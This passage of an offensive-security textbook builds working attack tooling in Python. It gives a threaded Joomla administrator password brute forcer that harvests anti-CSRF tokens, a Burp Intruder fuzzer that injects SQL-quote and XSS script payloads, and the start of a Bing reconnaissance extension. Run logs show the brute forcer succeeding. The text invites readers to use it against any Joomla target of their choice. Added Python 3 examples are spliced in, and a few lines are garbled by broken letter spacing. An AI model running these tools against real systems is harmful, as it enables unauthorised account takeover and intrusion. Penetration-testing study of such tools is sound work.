OWASP has a list of online and offline (virtual machines, ISOs, etc.) vulnerable web applications that you can test your tooling against. In this case, the URL that is referenced in the source code points to an intentionally buggy web application hosted by Acunetix. The cool thing is that it shows you how effective brute-forcing a web application can be. I recommend you set the threads variable to something sane such as 5 and run the script. In short order, you should start seeing results such as the ones below:
[200] => http://testphp.vulnweb.com/CVS/
[200] => http://testphp.vulnweb.com/admin/
[200] => http://testphp.vulnweb.com/index.bak
[200] => http://testphp.vulnweb.com/search.php
[200] => http://testphp.vulnweb.com/login.php
[200] => http://testphp.vulnweb.com/images/
[200] => http://testphp.vulnweb.com/index.php
[200] => http://testphp.vulnweb.com/logout.php
[200] => http://testphp.vulnweb.com/categories.php
You can see that we are pulling some interesting results from the remote website. I cannot stress enough the importance of performing content brute-forcing against all of your web application targets.

Brute-Forcing HTML Form Authentication

There may come a time in your web hacking career where you need to either gain access to a target, or if you're consulting, you might need to assess the password strength on an existing web system. It has become more and more common for web systems to have brute-force protection, whether a captcha, a simple math equation, or a login token that has to be submitted with the request. There are a number of brute forcers that can do the brute-forcing of a POST request to the login script, but in a lot of cases they are not flexible enough to deal with dynamic content or handle simple "are you human" checks. We'll create a simple brute forcer that will be useful against Joomla, a popular content management system. Modern Joomla systems include some basic anti-brute-force techniques, but still lack account lockouts or strong captchas by default.

In order to brute-force Joomla, we have two requirements that need to be met: retrieve the login token from the login form before submitting the password attempt and ensure that we accept cookies in our urllib2 session. In order to parse out the login form values, we'll use the native Python class HTMLParser. This will also be a good whirlwind tour of some additional features of urllib2 that you can employ when building tooling for your own targets. Let's get started by having a look at the Joomla administrator login form. This can be found by browsing to http://<yourtarget>.com/administrator/. For the sake of brevity, I've only included the relevant form elements.
<form action="/administrator/index.php" method="post" class="form-inline">
    <input name="username" type="text" class="input-medium" placeholder="User Name" size="15"/>
    <input name="passwd" type="password" class="input-medium" placeholder="Password" size="15"/>
    [the remaining hidden input elements of the form were lost in extraction; the last of them has a long, randomized name attribute]
</form>
Reading through this form, we are privy to some valuable information that we'll need to incorporate into our brute forcer. The first is that the form gets submitted to the /administrator/index.php path as an HTTP POST. The next are all of the fields required in order for the form submission to be successful. In particular, if you look at the last hidden field, you'll see that its name attribute is set to a long, randomized string. This is the essential piece of Joomla's anti-brute-forcing technique. That randomized string is checked against your current user session, stored in a cookie, and even if you are passing the correct credentials into the login processing script, if the randomized token is not present, the authentication will fail. This means we have to use the following request flow in our brute forcer in order to be successful against Joomla:

1. Retrieve the login page, and accept all cookies that are returned.
2. Parse out all of the form elements from the HTML.
3. Set the username and/or password to a guess from our dictionary.
4. Send an HTTP POST to the login processing script including all HTML form fields and our stored cookies.
5. Test to see if we have successfully logged in to the web application.

You can see that we are going to be utilizing some new and valuable techniques in this script. I will also mention that you should never "train" your tooling on a live target; always set up an installation of your target web application with known credentials and verify that you get the desired results. Let's open a new Python file named joomla_killer.py and enter the following code:
import urllib2
import urllib
import cookielib
import threading
import sys
import Queue

from HTMLParser import HTMLParser

# general settings
user_thread = 10
username = "admin"
wordlist_file = "/tmp/cain.txt"
resume = None

# target specific settings
➊ target_url = "http://192.168.112.131/administrator/index.php"
target_post = "http://192.168.112.131/administrator/index.php"

➋ username_field = "username"
password_field = "passwd"

➌ success_check = "Administration - Control Panel"
These general settings deserve a bit of explanation. The target_url variable ➊ is where our script will first download and parse the HTML. The target_post variable is where we will submit our brute-forcing attempt. Based on our brief analysis of the HTML in the Joomla login, we can set the username_field and password_field ➋ variables to the appropriate name of the HTML elements. Our success_check variable ➌ is a string that we'll check for after each brute-forcing attempt in order to determine whether we are successful or not. Let's now create the plumbing for our brute forcer; some of the following code will be familiar so I'll only highlight the newest techniques.
class Bruter(object):
    def __init__(self, username, words):
        self.username = username
        self.password_q = words
        self.found = False

        print "Finished setting up for: %s" % username

    def run_bruteforce(self):
        for i in range(user_thread):
            t = threading.Thread(target=self.web_bruter)
            t.start()

    def web_bruter(self):
        while not self.password_q.empty() and not self.found:
            brute = self.password_q.get().rstrip()
➊             jar = cookielib.FileCookieJar("cookies")
            opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))

            response = opener.open(target_url)
            page = response.read()

            print "Trying: %s : %s (%d left)" % (self.username, brute, self.password_q.qsize())

            # parse out the hidden fields
➋             parser = BruteParser()
            parser.feed(page)
            post_tags = parser.tag_results

            # add our username and password fields
➌             post_tags[username_field] = self.username
            post_tags[password_field] = brute

➍             login_data = urllib.urlencode(post_tags)
            login_response = opener.open(target_post, login_data)
            login_result = login_response.read()

➎             if success_check in login_result:
                self.found = True
                print "[*] Bruteforce successful."
                print "[*] Username: %s" % self.username
                print "[*] Password: %s" % brute
                print "[*] Waiting for other threads to exit..."
This is our primary brute-forcing class, which will handle all of the HTTP requests and manage cookies for us. After we grab our password attempt, we set up our cookie jar ➊ using the FileCookieJar class that will store the cookies in the cookies file. Next we initialize our urllib2 opener, passing in the initialized cookie jar, which tells urllib2 to pass off any cookies to it. We then make the initial request to retrieve the login form. When we have the raw HTML, we pass it off to our HTML parser and call its feed method ➋, which returns a dictionary of all of the retrieved form elements. After we have successfully parsed the HTML, we replace the username and password fields with our brute-forcing attempt ➌. Next we URL encode the POST variables ➍, and then pass them in our subsequent HTTP request. After we retrieve the result of our authentication attempt, we test whether the authentication was successful or not ➎. Now let's implement the core of our HTML processing. Add the following class to your joomla_killer.py script:
class BruteParser(HTMLParser):
    def __init__(self):
        HTMLParser.__init__(self)
➊         self.tag_results = {}

    def handle_starttag(self, tag, attrs):
➋         if tag == "input":
            tag_name = None
            tag_value = None

            for name, value in attrs:
                if name == "name":
➌                     tag_name = value
                if name == "value":
➍                     tag_value = value

            # store the value attribute we collected, not the last loop variable
            if tag_name is not None:
➎                 self.tag_results[tag_name] = tag_value
This forms the specific HTML parsing class that we want to use against our target. After you have the basics of using the HTMLParser class, you can adapt it to extract information from any web application that you might be attacking. The first thing we do is create a dictionary in which our results will be stored ➊. When we call the feed function, it passes in the entire HTML document and our handle_starttag function is called whenever a tag is encountered. In particular, we're looking for HTML input tags ➋ and our main processing occurs when we determine that we have found one. We begin iterating over the attributes of the tag, and if we find the name ➌ or value ➍ attributes, we associate them in the tag_results dictionary ➎. After the HTML has been processed, our brute-forcing class can then replace the username and password fields while leaving the remainder of the fields intact.
HTMLPARSER 101

There are three primary methods you can implement when using the HTMLParser class: handle_starttag, handle_endtag, and handle_data. The handle_starttag function will be called any time an opening HTML tag is encountered, and the opposite is true for the handle_endtag function, which gets called each time a closing HTML tag is encountered. The handle_data function gets called when there is raw text in between tags. The function prototypes for each function are slightly different, as follows:

    handle_starttag(self, tag, attributes)
    handle_endtag(self, tag)
    handle_data(self, data)

A quick example to highlight this:

    <title>Python rocks!</title>

    handle_starttag => tag variable would be "title"
    handle_data     => data variable would be "Python rocks!"
    handle_endtag   => tag variable would be "title"

With this very basic understanding of the HTMLParser class, you can do things like parse forms, find links for spidering, extract all of the pure text for data mining purposes, or find all of the images in a page.
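The BruteParser logic above and the three HTMLParser callbacks from the HTMLPARSER 101 box, combined into one added Python 3 example (not the book's code): it collects every input name/value pair including the hidden token, records the page title via handle_data/handle_endtag, and builds the urlencoded POST body the way joomla_killer does. The login page is constructed for the example and TOKEN_PLACEHOLDER stands in for Joomla's randomized field name.

```python
from html.parser import HTMLParser
from urllib.parse import urlencode, parse_qs


class FormParser(HTMLParser):
    """Collect <input> fields, the form action, and the <title> text."""

    def __init__(self):
        super().__init__()
        self.tag_results = {}      # input name -> value ("" when absent)
        self.form_action = None
        self.title = ""
        self._in_title = False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form" and self.form_action is None:
            self.form_action = attrs.get("action")
        elif tag == "input":
            name = attrs.get("name")
            # inputs without a name (e.g. the submit button) are never posted
            if name is not None:
                self.tag_results[name] = attrs.get("value", "")
        elif tag == "title":
            self._in_title = True

    def handle_data(self, data):
        if self._in_title:
            self.title += data

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False


def parse_login_form(html):
    parser = FormParser()
    parser.feed(html)
    parser.close()
    return parser


def build_login_body(html, username, password,
                     username_field="username", password_field="passwd"):
    """Keep every hidden field (token included); replace only the credentials."""
    parsed = parse_login_form(html)
    post_tags = dict(parsed.tag_results)
    post_tags[username_field] = username
    post_tags[password_field] = password
    return urlencode(post_tags)


def login_succeeded(response_html, success_check="Administration - Control Panel"):
    """Same test joomla_killer applies to the POST response body."""
    return success_check in response_html


# Constructed login page; field layout follows the form shown in the text
LOGIN_PAGE = """<html><head><title>Joomla! Administration</title></head><body>
<form action="/administrator/index.php" method="post" class="form-inline">
<input name="username" type="text" class="input-medium" placeholder="User Name" size="15"/>
<input name="passwd" type="password" class="input-medium" placeholder="Password" size="15"/>
<input type="submit" value="Log in"/>
<input type="hidden" name="option" value="com_login"/>
<input type="hidden" name="task" value="login"/>
<input type="hidden" name="TOKEN_PLACEHOLDER" value="1"/>
</form></body></html>"""


if __name__ == "__main__":
    page = parse_login_form(LOGIN_PAGE)
    print("POST to", page.form_action)
    print(build_login_body(LOGIN_PAGE, "admin", "justin"))
```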
To wrap up our Joomla brute forcer, let's copy-paste the build_wordlist function from our previous section and add the following code:

# paste the build_wordlist function here

words = build_wordlist(wordlist_file)

bruter_obj = Bruter(username, words)
bruter_obj.run_bruteforce()

That's it! We simply pass in the username and our wordlist to our Bruter class and watch the magic happen.

Kicking the Tires

If you don't have Joomla installed into your Kali VM, then you should install it now. My target VM is at 192.168.112.131 and I am using a wordlist provided by Cain and Abel,[12] a popular brute-forcing and cracking toolset. I have already preset the username to admin and the password to justin in the Joomla installation so that I can make sure it works. I then added justin to the cain.txt wordlist file about 50 entries or so down the file. When running the script, I get the following output:
$ python2.7 joomla_killer.py
Finished setting up for: admin
Trying: admin : 0racl38 (306697 left)
Trying: admin : !@#$% (306697 left)
Trying: admin : !@#$%^ (306697 left)
--snip--
Trying: admin : 1p2o3i (306659 left)
Trying: admin : 1qw23e (306657 left)
Trying: admin : 1q2w3e (306656 left)
Trying: admin : 1sanjose (306655 left)
Trying: admin : 2 (306655 left)
Trying: admin : justin (306655 left)
Trying: admin : 2112 (306646 left)
[*] Bruteforce successful.
[*] Username: admin
[*] Password: justin
[*] Waiting for other threads to exit...
Trying: admin : 249 (306646 left)
Trying: admin : 2welcome (306646 left)
You can see that it successfully brute-forces and logs in to the Joomla administrator console. To verify, you of course would manually log in and make sure. After you test this locally and you're certain it works, you can use this tool against a target Joomla installation of your choice.

[10] DirBuster Project: https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
[11] SVNDigger Project: https://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing/
[12] Cain and Abel: http://www.oxid.it/cain.html

Chapter 6. Extending Burp Proxy

If you've ever tried hacking a web application, you likely have used Burp Suite to perform spidering, proxy browser traffic, and carry out other attacks. Recent versions of Burp Suite include the ability to add your own tooling, called Extensions, to Burp. Using Python, Ruby, or pure Java, you can add panels in the Burp GUI and build automation techniques into Burp Suite. We're going to take advantage of this feature and add some handy tooling to Burp for performing attacks and extended reconnaissance. The first extension will enable us to utilize an intercepted HTTP request from Burp Proxy as a seed for creating a mutation fuzzer that can be run in Burp Intruder. The second extension will interface with the Microsoft Bing API to show us all virtual hosts located on the same IP address as our target site, as well as any subdomains detected for the target domain.

I'm going to assume that you have played with Burp before and that you know how to trap requests with the Proxy tool, as well as how to send a trapped request to Burp Intruder. If you need a tutorial on how to do these tasks, please visit PortSwigger Web Security (http://www.portswigger.net/) to get started.

I have to admit that when I first started exploring the Burp Extender API, it took me a few attempts to understand how it worked. I found it a bit confusing, as I'm a pure Python guy and have limited Java development experience. But I found a number of extensions on the Burp website that let me see how other folks had developed extensions, and I used that prior art to help me understand how to begin implementing my own code. I'm going to cover some basics on extending functionality, but I'll also show you how to use the API documentation as a guide for developing your own extensions.

Setting Up

First, download Burp from http://www.portswigger.net/ and get it ready to go. As sad as it makes me to admit this, you will require a modern Java installation, which all operating systems either have packages or installers for. The next step is to grab the Jython (a Python implementation written in Java) standalone JAR file; we'll point Burp to this. You can find this JAR file on the No Starch site along with the rest of the book's code (http://www.nostarch.com/blackhatpython/) or visit the official site, http://www.jython.org/downloads.html, and select the Jython 2.7 Standalone Installer. Don't let the name fool you; it's just a JAR file. Save the JAR file to an easy-to-remember location, such as your Desktop.

Next, open up a command-line terminal, and run Burp like so:

#> java -XX:MaxPermSize=1G -jar burpsuite_pro_v1.6.jar

This will get Burp to fire up and you should see its UI full of wonderful tabs, as shown in Figure 6-1.

Now let's point Burp at our Jython interpreter. Click the Extender tab, and then click the Options tab. In the Python Environment section, select the location of your Jython JAR file, as shown in Figure 6-2.

You can leave the rest of the options alone, and we should be ready to start coding our first extension. Let's get rocking!
Figure 6-1. Burp Suite GUI loaded properly

Figure 6-2. Configuring the Jython interpreter location

Burp F uzzin g
At s o m e p oin t i n y o ur c are er, y o u m ay f in d y o urs e lf a tta ckin g a w eb a p plic ati o n o r w eb s e rv ic e th at
doesn ’t a llo w y o u to u se tr a d iti o nal w eb a p plic ati o n a sse ssm ent to ols . W heth er w ork in g w ith a
binary protocol wrapped inside HTTP traffic or complex JSON requests, it is critical that you are able to test for traditional web application bugs. The application might be using too many parameters, or it's obfuscated in some way that performing a manual test would take far too much time. I have also been guilty of running standard tools that are not designed to deal with strange protocols or even JSON in a lot of cases. This is where it is useful to be able to leverage Burp to establish a solid baseline of HTTP traffic, including authentication cookies, while passing off the body of the request to a custom fuzzer that can then manipulate the payload in any way you choose. We are going to work on our first Burp extension to create the world's simplest web application fuzzer, which you can then expand into something more intelligent.

Burp has a number of tools that you can use when you're performing web application tests. Typically, you will trap all requests using the Proxy, and when you see an interesting request go past, you'll send it to another Burp tool. A common technique I use is to send them to the Repeater tool, which lets me replay web traffic, as well as manually modify any interesting spots. To perform more automated attacks in query parameters, you will send a request to the Intruder tool, which attempts to automatically figure out which areas of the web traffic should be modified, and then allows you to use a variety of attacks to try to elicit error messages or tease out vulnerabilities. A Burp extension can interact in numerous ways with the Burp suite of tools, and in our case we'll be bolting additional functionality onto the Intruder tool directly.
My first natural instinct is to take a look at the Burp API documentation to determine what Burp classes I need to extend in order to write my custom extension. You can access this documentation by clicking the Extender tab and then the APIs tab. This can look a little daunting because it looks (and is) very Java-y. The first thing we notice is that the developers of Burp have aptly named each class so that it's easy to figure out where we want to start. In particular, because we're looking at fuzzing web requests during an Intruder attack, I see the IIntruderPayloadGeneratorFactory and IIntruderPayloadGenerator classes. Let's take a look at what the documentation says for the IIntruderPayloadGeneratorFactory class:
/**
 * Extensions can implement this interface and then call
 * IBurpExtenderCallbacks.registerIntruderPayloadGeneratorFactory()   ➊
 * to register a factory for custom Intruder payloads.
 */
public interface IIntruderPayloadGeneratorFactory
{
    /**
     * This method is used by Burp to obtain the name of the payload
     * generator. This will be displayed as an option within the
     * Intruder UI when the user selects to use extension-generated
     * payloads.
     *
     * @return The name of the payload generator.
     */
    String getGeneratorName();   // ➋

    /**
     * This method is used by Burp when the user starts an Intruder
     * attack that uses this payload generator.
     *
     * @param attack
     * An IIntruderAttack object that can be queried to obtain details
     * about the attack in which the payload generator will be used.
     * @return A new instance of
     * IIntruderPayloadGenerator that will be used to generate
     * payloads for the attack.
     */
    IIntruderPayloadGenerator createNewInstance(IIntruderAttack attack);   // ➌
}
The first bit of documentation ➊ tells us to get our extension registered correctly with Burp. We're going to extend the main Burp class as well as the IIntruderPayloadGeneratorFactory class. Next we see that Burp is expecting two functions to be present in our main class. The getGeneratorName function ➋ will be called by Burp to retrieve the name of our payload generator (this is the name that shows up in the Intruder UI), and we are expected to return a string. The createNewInstance function ➌ expects us to return an instance of the IIntruderPayloadGenerator, which will be a second class that we have to create.

Now let's implement the actual Python code to meet these requirements, and then we'll look at how the IIntruderPayloadGenerator class gets added. Open a new Python file, name it bhp_fuzzer.py, and punch out the following code:
from burp import IBurpExtender   # ➊
from burp import IIntruderPayloadGeneratorFactory
from burp import IIntruderPayloadGenerator
from java.util import List, ArrayList
import random

class BurpExtender(IBurpExtender, IIntruderPayloadGeneratorFactory):   # ➋
    def registerExtenderCallbacks(self, callbacks):
        self._callbacks = callbacks
        self._helpers = callbacks.getHelpers()
        callbacks.registerIntruderPayloadGeneratorFactory(self)   # ➌
        return

    def getGeneratorName(self):   # ➍
        return "BHP Payload Generator"

    def createNewInstance(self, attack):   # ➎
        return BHPFuzzer(self, attack)
So this is the simple skeleton of what we need in order to satisfy the first set of requirements for our extension. We have to first import the IBurpExtender class ➊, which is a requirement for every extension we write. We follow this up by importing our necessary classes for creating an Intruder payload generator. Next we define our BurpExtender class ➋, which extends the IBurpExtender and IIntruderPayloadGeneratorFactory classes. We then use the registerIntruderPayloadGeneratorFactory function ➌ to register our class so that the Intruder tool is aware that we can generate payloads. Next we implement the getGeneratorName function ➍ to simply return the name of our payload generator. The last step is the createNewInstance function ➎ that receives the attack parameter and returns an instance of the IIntruderPayloadGenerator class, which we called BHPFuzzer.

Let's have a peek at the documentation for the IIntruderPayloadGenerator class so we know what to implement.
/**
 * This interface is used for custom Intruder payload generators.
 * Extensions
 * that have registered an
 * IIntruderPayloadGeneratorFactory must return a new instance of
 * this interface when required as part of a new Intruder attack.
 */
public interface IIntruderPayloadGenerator
{
    /**
     * This method is used by Burp to determine whether the payload
     * generator is able to provide any further payloads.
     *
     * @return Extensions should return
     * false when all the available payloads have been used up,
     * otherwise true
     */
    boolean hasMorePayloads();   // ➊

    /**
     * This method is used by Burp to obtain the value of the next payload.
     *
     * @param baseValue The base value of the current payload position.
     * This value may be null if the concept of a base value is not
     * applicable (e.g. in a battering ram attack).
     * @return The next payload to use in the attack.
     */
    byte[] getNextPayload(byte[] baseValue);   // ➋

    /**
     * This method is used by Burp to reset the state of the payload
     * generator so that the next call to
     * getNextPayload() returns the first payload again. This
     * method will be invoked when an attack uses the same payload
     * generator for more than one payload position, for example in a
     * sniper attack.
     */
    void reset();   // ➌
}
Okay! So we need to implement the base class and it needs to expose three functions. The first function, hasMorePayloads ➊, is simply there to decide whether to keep feeding mutated requests back to Burp Intruder. We'll just use a counter to deal with this, and once the counter is at the maximum that we set, we'll return False so that no more fuzzing cases are generated. The getNextPayload function ➋ will receive the original payload from the HTTP request that you trapped. Or, if you have selected multiple payload areas in the HTTP request, you will only receive the bytes that you requested to be fuzzed (more on this later). This function allows us to fuzz the original test case and then return it so that Burp sends the new fuzzed value. The last function, reset ➌, is there so that if we generate a known set of fuzzed requests, say five of them, then for each payload position we have designated in the Intruder tab, we will iterate through the five fuzzed values.

Our fuzzer isn't so fussy, and will always just keep randomly fuzzing each HTTP request. Now let's see how this looks when we implement it in Python. Add the following code to the bottom of bhp_fuzzer.py:
class BHPFuzzer(IIntruderPayloadGenerator):   # ➊
    def __init__(self, extender, attack):
        self._extender = extender
        self._helpers = extender._helpers
        self._attack = attack
        self.max_payloads = 10   # ➋
        self.num_iterations = 0
        return

    def hasMorePayloads(self):   # ➌
        if self.num_iterations == self.max_payloads:
            return False
        else:
            return True

    def getNextPayload(self, current_payload):   # ➍
        # convert the Java byte[] into a string; Burp's helper copes with
        # high bytes, which a chr()-per-byte loop would choke on
        payload = self._helpers.bytesToString(current_payload)   # ➎

        # call our simple mutator to fuzz the POST
        payload = self.mutate_payload(payload)   # ➏

        # increase the number of fuzzing attempts
        self.num_iterations += 1   # ➐

        # hand the mutated value back to Burp as a byte[]
        return self._helpers.stringToBytes(payload)

    def reset(self):
        self.num_iterations = 0
        return
We start by defining our BHPFuzzer class ➊ that extends the class IIntruderPayloadGenerator. We define the required class variables as well as add max_payloads ➋ and num_iterations variables so that we can keep track of when to let Burp know we're finished fuzzing. You could of course let the extension run forever if you like, but for testing we'll leave this in place. Next we implement the hasMorePayloads function ➌ that simply checks whether we have reached the maximum number of fuzzing iterations. You could modify this to continually run the extension by always returning True. The getNextPayload function ➍ is the one that receives the original HTTP payload and it is here that we will be fuzzing. The current_payload variable arrives as a byte array, so we convert this to a string ➎ using Burp's helper and then pass it to our fuzzing function mutate_payload ➏. We then increment the num_iterations variable ➐ and return the mutated payload, converted back to bytes. Our last function is the reset function, which sets the counter back to zero so that Burp can start over when it reuses the generator for another payload position.

Now let's drop in the world's simplest fuzzing function that you can modify to your heart's content. Because this function is aware of the current payload, if you have a tricky protocol that needs something special, like a CRC checksum at the beginning of the payload or a length field, you can do those calculations inside this function before returning, which makes it extremely flexible. Add the following code to bhp_fuzzer.py, making sure that the mutate_payload function is tabbed into our BHPFuzzer class:
    def mutate_payload(self, original_payload):
        # pick a simple mutator or even call an external script
        picker = random.randint(1, 3)

        # select a random offset in the payload to mutate; an empty payload
        # has no valid offset, so fall back to 0 instead of raising
        offset = random.randint(0, max(len(original_payload) - 1, 0))
        payload = original_payload[:offset]

        # random offset insert a SQL injection attempt
        if picker == 1:
            payload += "'"

        # jam an XSS attempt in
        if picker == 2:
            payload += "<script>alert('BHP!');</script>"

        # repeat a chunk of the original payload a random number of times
        if picker == 3:
            remaining = original_payload[offset:]
            if remaining:
                chunk_length = random.randint(1, len(remaining))
                repeater = random.randint(1, 10)
                for i in range(repeater):
                    payload += remaining[:chunk_length]

        # add the remaining bits of the payload
        payload += original_payload[offset:]
        return payload
This simple fuzzer is pretty self-explanatory. We'll randomly pick from three mutators: a simple SQL injection test with a single-quote, an XSS attempt, and then a mutator that selects a random chunk in the original payload and repeats it a random number of times. We now have a Burp Intruder extension that we can use. Let's take a look at how we can get it loaded.
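The length-field and checksum case mentioned above, as an added example that is not the book's code: a Python 3 stand-in for the generator with the same three methods, driven offline the way Intruder drives it. The framing (a 4-byte length and a CRC32 ahead of the body) is hypothetical, and the probe strings and sample body are constructed. The points it shows are that the mutator works on the inner body while the length and CRC are recomputed before the case is returned, that an empty payload is handled, and that re-seeding in reset() makes every payload position replay the same sequence.

```python
import random
import struct
import zlib

# Probes for the two "inject something" mutators from the chapter.
SQLI_PROBE = b"'"
XSS_PROBE = b"<script>alert(1)</script>"


def mutate(original, rng):
    """One random mutation of a bytes payload, mirroring the chapter's three
    mutators: insert a quote, insert a script tag, or repeat a chunk that
    starts at the chosen offset. An empty payload is returned unchanged
    because there is no valid offset to pick."""
    if not original:
        return original
    offset = rng.randint(0, len(original) - 1)
    head, tail = original[:offset], original[offset:]
    picker = rng.randint(1, 3)
    if picker == 1:
        insert = SQLI_PROBE
    elif picker == 2:
        insert = XSS_PROBE
    else:
        chunk_length = rng.randint(1, len(tail))
        insert = tail[:chunk_length] * rng.randint(1, 10)
    return head + insert + tail


def frame(body):
    """Hypothetical framing for the 'binary protocol inside HTTP' case:
    big-endian u32 length, u32 CRC32, then the body."""
    return struct.pack(">II", len(body), zlib.crc32(body)) + body


def unframe(blob):
    """Inverse of frame(); raises ValueError on a short, truncated or corrupt frame."""
    if len(blob) < 8:
        raise ValueError("frame shorter than its header")
    length, crc = struct.unpack(">II", blob[:8])
    body = blob[8:8 + length]
    if len(body) != length or zlib.crc32(body) != crc:
        raise ValueError("length or CRC mismatch")
    return body


def is_valid_frame(blob):
    try:
        unframe(blob)
        return True
    except ValueError:
        return False


class FramedFuzzer:
    """Pure-Python stand-in for IIntruderPayloadGenerator with the same three
    methods. It mutates only the inner body and re-frames the result, so the
    server does not reject every case on the length or checksum before the
    mutated bytes reach the parser we actually want to exercise."""

    def __init__(self, max_payloads=10, seed=0):
        self.max_payloads = max_payloads
        self.seed = seed
        self.reset()

    def hasMorePayloads(self):
        return self.num_iterations < self.max_payloads

    def getNextPayload(self, base_value):
        body = unframe(base_value)
        mutated = mutate(body, self.rng)
        self.num_iterations += 1
        return frame(mutated)

    def reset(self):
        # Re-seeding makes every payload position see the same sequence, which
        # is what Burp asks of reset() and what you need to replay the case
        # that produced an interesting response.
        self.rng = random.Random(self.seed)
        self.num_iterations = 0


def run_attack(base_value, max_payloads=10, seed=0):
    """Drive the generator the way Intruder does and collect the cases."""
    gen = FramedFuzzer(max_payloads, seed)
    cases = []
    while gen.hasMorePayloads():
        cases.append(gen.getNextPayload(base_value))
    return cases


if __name__ == "__main__":
    base = frame(b"searchFor=test&goButton=go")   # constructed sample body
    for case in run_attack(base, max_payloads=5):
        print(unframe(case))
```

Keeping the seed in the generator rather than using the module-level random means that when request 5 of a run turns up an error, re-running with the same seed reproduces exactly that payload, which the book's version cannot do.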

Kicking the Tires

First we have to get our extension loaded and make sure there are no errors. Click the Extender tab in Burp and then click the Add button. A screen appears that will allow you to point Burp at the fuzzer. Ensure that you set the same options as shown in Figure 6-3.

Figure 6-3. Setting Burp to load our extension

Click Next and Burp will begin loading our extension. If all goes well, Burp should indicate that the extension was loaded successfully. If there are errors, click the Errors tab, debug any typos, and then click the Close button. Your Extender screen should now look like Figure 6-4.

Figure 6-4. Burp Extender showing that our extension is loaded

You can see that our extension is loaded and that Burp has identified that an Intruder payload generator is registered. We are now ready to leverage our extension in a real attack. Make sure your web browser is set to use Burp Proxy as a localhost proxy on port 8080, and let's attack the same Acunetix web application from Chapter 5. Simply browse to:

http://testphp.vulnweb.com
As an example, I used the little search bar on their site to submit a search for the string "test". Figure 6-5 shows how I can see this request in the HTTP history tab of the Proxy tab, and I have right-clicked the request to send it to Intruder.

Figure 6-5. Selecting an HTTP request to send to Intruder
Now switch to the Intruder tab and click the Positions tab. A screen appears that shows each query parameter highlighted. This is Burp identifying the spots where we should be fuzzing. You can try moving the payload delimiters around or selecting the entire payload to fuzz if you choose, but in our case let's leave Burp to decide where we are going to fuzz. For clarity, see Figure 6-6, which shows how payload highlighting works.

Now click the Payloads tab. In this screen, click the Payload type drop-down and select Extension-generated. In the Payload Options section, click the Select generator... button and choose BHP Payload Generator from the drop-down. Your Payload screen should now look like Figure 6-7.

Figure 6-6. Burp Intruder highlighting payload parameters

Figure 6-7. Using our fuzzing extension as a payload generator

Now we're ready to send our requests. At the top of the Burp menu bar, click Intruder and then select Start Attack. This starts sending fuzzed requests, and you will be able to quickly go through the results. When I ran the fuzzer, I received output as shown in Figure 6-8.

Figure 6-8. Our fuzzer running in an Intruder attack

As you can see from the warning on line 61 of the response, in request 5, we discovered what appears to be a SQL injection vulnerability.

Now of course, our fuzzer is only for demonstration purposes, but you'll be surprised how effective it can be for getting a web application to output errors, disclose application paths, or behave in ways that lots of other scanners might miss. The important thing is to understand how we managed to get our custom extension in line with Intruder attacks. Now let's create an extension that will assist us in performing some extended reconnaissance against a web server.

Bing for Burp

When you're attacking a web server, it's not uncommon for that single machine to serve several web applications, some of which you might not be aware of. Of course, you want to discover these hostnames exposed on the same web server because they might give you an easier way to get a shell. It's not rare to find an insecure web application or even development resources located on the same machine as your target. Microsoft's Bing search engine has search capabilities that allow you to query Bing for all websites it finds on a single IP address (using the "IP" search modifier). Bing will also tell you all of the subdomains of a given domain (using the "domain" modifier).

Now we could, of course, use a scraper to submit these queries to Bing and then scrape the HTML in the results, but that would be bad manners (and also violate most search engines' terms of use). In order to stay out of trouble, we can use the Bing API [13] to submit these queries programmatically and then parse the results ourselves. We won't implement any fancy Burp GUI additions (other than a context menu) with this extension; we simply output the results into Burp each time we run a query, and any detected URLs will be added to Burp's target scope automatically. Because I already walked you through how to read the Burp API documentation and translate it into Python, we're going to get right to the code.

Crack open bhp_bing.py and hammer out the following code:
from burp import IBurpExtender
from burp import IContextMenuFactory
from javax.swing import JMenuItem
from java.util import List, ArrayList
from java.net import URL
import socket
import urllib
import json
import re
import base64

bing_api_key = "YOURKEY"   # ➊

class BurpExtender(IBurpExtender, IContextMenuFactory):   # ➋
    def registerExtenderCallbacks(self, callbacks):
        self._callbacks = callbacks
        self._helpers = callbacks.getHelpers()
        self.context = None

        # we set up our extension
        callbacks.setExtensionName("BHP Bing")
        callbacks.registerContextMenuFactory(self)   # ➌
        return

    def createMenuItems(self, context_menu):
        self.context = context_menu
        menu_list = ArrayList()
        menu_list.add(JMenuItem("Send to Bing", actionPerformed=self.bing_menu))   # ➍
        return menu_list
This is the first bit of our Bing extension. Make sure you have your Bing API key pasted in place ➊; you are allowed something like 2,500 free searches per month. We begin by defining our BurpExtender class ➋ that implements the standard IBurpExtender interface and the IContextMenuFactory, which allows us to provide a context menu when a user right-clicks a request in Burp. We register our menu handler ➌ so that we can determine which site the user clicked, which then enables us to construct our Bing queries. Next we set up our createMenuItems function, which will receive an IContextMenuInvocation object that we will use to determine which HTTP request was selected. The last step is to render our menu item and have the bing_menu function handle the click event ➍. Now let's add the functionality to perform the Bing query, output the results, and add any discovered virtual hosts to Burp's target scope.
    def bing_menu(self, event):
        # grab the details of what the user clicked
        http_traffic = self.context.getSelectedMessages()   # ➊
        print "%d requests highlighted" % len(http_traffic)

        for traffic in http_traffic:
            http_service = traffic.getHttpService()
            host = http_service.getHost()
            print "User selected host: %s" % host
            self.bing_search(host)
        return

    def bing_search(self, host):
        # check if we have an IP or hostname (anchored, so "1.2.3.4.example"
        # is treated as a hostname rather than an address)
        is_ip = re.match(r"[0-9]+(?:\.[0-9]+){3}$", host)

        if is_ip:   # ➋
            ip_address = host
            domain = False
        else:
            try:
                ip_address = socket.gethostbyname(host)
            except socket.error as e:
                # an unresolvable host has no address to pivot on; skip it
                # rather than killing the menu handler
                print "Could not resolve %s: %s" % (host, e)
                return
            domain = True

        bing_query_string = "'ip:%s'" % ip_address
        self.bing_query(bing_query_string)   # ➌

        if domain:
            bing_query_string = "'domain:%s'" % host
            self.bing_query(bing_query_string)   # ➍
